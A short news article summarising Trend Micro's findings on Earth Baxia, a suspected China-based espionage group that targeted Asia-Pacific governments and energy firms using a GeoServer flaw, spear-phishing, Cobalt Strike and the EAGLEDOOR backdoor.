In July 2024, cybersecurity firm Trend Micro discovered a suspected advanced persistent threat (APT) originating from China that targeted a government organization in Taiwan. The threat actor, known as Earth Baxia, exploited a recently patched security flaw in OSGeo GeoServer GeoTools. This intrusion activity is believed to have targeted government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand. Although the lure documents were found in Simplified Chinese, it is uncertain which specific sectors within China were affected.
The attack utilized a multi-stage infection chain process, employing spear-phishing emails and the exploitation of the GeoServer flaw to deliver Cobalt Strike and a new unknown backdoor named EAGLEDOOR. These malicious tools allowed the threat actor to gather sensitive information and deliver payloads. GrimResource and AppDomainManager injection were used to deploy additional payloads in order to deceive victims. The first technique, GrimResource, was used to download the next-stage malware using a decoy MSC file known as RIPCOY embedded within a ZIP archive attachment.
Interestingly, another Japanese cybersecurity company, NTT Security Holdings, recently reported activity by a cluster linked to APT41 that also used the same techniques to target Taiwan, the Philippines military, and Vietnamese energy organizations. There are commonalities between these two intrusion sets, including the use of Cobalt Strike command-and-control (C2) domains that imitate popular cloud service providers like Amazon Web Services, Microsoft Azure, and even Trend Micro. The ultimate goal of these attacks is to deploy a custom variant of Cobalt Strike that acts as a launchpad for the EAGLEDOOR backdoor.
The EAGLEDOOR backdoor, also known as “Eagle.dll,” supports four communication methods with the C2 server: DNS, HTTP, TCP, and Telegram. While the first three protocols are primarily used to transmit victim status information, the core functionality is achieved through the Telegram Bot API. This API allows for the upload and download of files and the execution of additional payloads. Harvested data is then exfiltrated using curl.exe.
The researchers at Trend Micro believe that Earth Baxia is based in China and conducted a sophisticated campaign targeting government and energy sectors in multiple Asia-Pacific countries. The threat actor utilized advanced techniques, including GeoServer exploitation, spear-phishing, and customized malware, to infiltrate and exfiltrate data. One notable aspect of this campaign is the use of public cloud services to host malicious files, as well as the multi-protocol support of EAGLEDOOR, which demonstrates the complexity and adaptability of the attacker’s operations.
In conclusion, the discovery of this APT campaign highlights the ongoing threat that cyber espionage poses to governments and critical industries in the Asia-Pacific region. The use of advanced techniques and customized malware showcases the sophistication and determination of threat actors like Earth Baxia. It is crucial for organizations and individuals to remain vigilant, keeping their software up to date and implementing robust cybersecurity measures to protect against such targeted attacks.
Source link
